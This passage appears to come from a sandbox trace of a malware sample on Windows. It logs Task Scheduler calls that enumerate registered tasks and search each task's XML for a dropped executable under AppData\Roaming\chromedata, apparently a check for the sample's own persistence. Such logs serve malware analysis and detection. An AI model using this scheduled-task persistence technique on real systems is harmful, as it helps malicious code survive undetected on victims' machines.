\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0
	[0073.090] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x31\x30\x2d\x31\x39\x54\x31\x33\x3a\x31\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.090] IUnknown:Release (This=0x552308) returned 0x0
	[0073.090] IUnknown:Release (This=0x552948) returned 0x0
	[0073.090] ITaskFolder:GetFolders (in: This=0x552918, flags=0, ppFolders=0x12917c | out: ppFolders=0x12917c*=0x552948) returned 0x0
	[0073.094] ITaskFolderCollection:get_Count (in: This=0x552948, pCount=0x129174 | out: pCount=0x129174*=3) returned 0x0
	[0073.094] ITaskFolderCollection:get_Item (in: This=0x552948, index=0x12907c*(varType=0x3, wReserved1=0x55, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x12919c | out: ppFolder=0x12919c*=0x552320) returned 0x0
	[0073.094] ITaskFolder:GetTasks (in: This=0x552320, flags=1, ppTasks=0x129070 | out: ppTasks=0x129070*=0x552370) returned 0x0
	[0073.094] IRegisteredTaskCollection:get_Count (in: This=0x552370, pCount=0x129060 | out: pCount=0x129060*=0) returned 0x0
	[0073.094] IUnknown:Release (This=0x552370) returned 0x0
	[0073.094] ITaskFolder:GetFolders (in: This=0x552320, flags=0, ppFolders=0x129064 | out: ppFolders=0x129064*=0x552370) returned 0x0
	[0073.095] ITaskFolderCollection:get_Count (in: This=0x552370, pCount=0x12905c | out: pCount=0x12905c*=2) returned 0x0
	[0073.095] ITaskFolderCollection:get_Item (in: This=0x552370, index=0x128f64*(varType=0x3, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x1, varVal2=0x76fa8cd5), ppFolder=0x129084 | out: ppFolder=0x129084*=0x552440) returned 0x0
	[0073.095] ITaskFolder:GetTasks (in: This=0x552440, flags=1, ppTasks=0x128f58 | out: ppTasks=0x128f58*=0x5524a0) returned 0x0
	[0073.096] IRegisteredTaskCollection:get_Count (in: This=0x5524a0, pCount=0x128f48 | out: pCount=0x128f48*=0) returned 0x0
	[0073.096] IUnknown:Release (This=0x5524a0) returned 0x0
	[0073.096] ITaskFolder:GetFolders (in: This=0x552440, flags=0, ppFolders=0x128f4c | out: ppFolders=0x128f4c*=0x55fd38) returned 0x0
	[0073.117] ITaskFolderCollection:get_Count (in: This=0x55fd38, pCount=0x128f44 | out: pCount=0x128f44*=45) returned 0x0
	[0073.117] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.118] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fea8) returned 0x0
	[0073.118] IRegisteredTaskCollection:get_Count (in: This=0x55fea8, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.118] IRegisteredTaskCollection:get_Item (in: This=0x55fea8, index=0x128d34*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c0048) returned 0x0
	[0073.119] IRegisteredTask:get_Name (in: This=0x22c0048, pName=0x128e3c | out: pName=0x128e3c*="AD RMS Rights Policy Template Management (Automated)") returned 0x0
	[0073.119] IRegisteredTask:get_Xml (in: This=0x22c0048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2006-11-10T14:29:55.5851926</Date>\r\n    <Author>$(@%systemRoot%\\System32\\msdrm.dll,-6001)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\msdrm.dll,-6002)</Description>\r\n    <URI>\\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"7dba1862-fdda-4030-83de-895375c111d4\">\r\n      <StartBoundary>2006-11-09T03:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n    <LogonTrigger id=\"06b3f632-87ad-4ac0-9737-48ea5ddbaf11\">\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1H</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-1-0</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <ComHandler>\r\n      <ClassId>{CF2CF428-325B-48D3-8CA8-7633E36E5A32}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.123] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2006-11-10T14:29:55.5851926</Date>\r\n    <Author>$(@%systemRoot%\\System32\\msdrm.dll,-6001)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\msdrm.dll,-6002)</Description>\r\n    <URI>\\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"7dba1862-fdda-4030-83de-895375c111d4\">\r\n      <StartBoundary>2006-11-09T03:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n    <LogonTrigger id=\"06b3f632-87ad-4ac0-9737-48ea5ddbaf11\">\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1H</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-1-0</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <ComHandler>\r\n      <ClassId>{CF2CF428-325B-48D3-8CA8-7633E36E5A32}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.123] IUnknown:Release (This=0x22c0048) returned 0x0
	[0073.123] IRegisteredTaskCollection:get_Item (in: This=0x55fea8, index=0x128d34*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c0048) returned 0x0
	[0073.123] IRegisteredTask:get_Name (in: This=0x22c0048, pName=0x128e3c | out: pName=0x128e3c*="AD RMS Rights Policy Template Management (Manual)") returned 0x0
	[0073.123] IRegisteredTask:get_Xml (in: This=0x22c0048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2006-11-10T14:29:55.5851926</Date>\r\n    <Author>$(@%systemRoot%\\System32\\msdrm.dll,-6001)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\msdrm.dll,-6003)</Description>\r\n    <URI>\\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger id=\"06b3f632-87ad-4ac0-9737-48ea5ddbaf11\">\r\n      <Enabled>false</Enabled>\r\n      <Delay>PT1H</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-1-0</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <ComHandler>\r\n      <ClassId>{BF5CB148-7C77-4d8a-A53E-D81C70CF743C}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
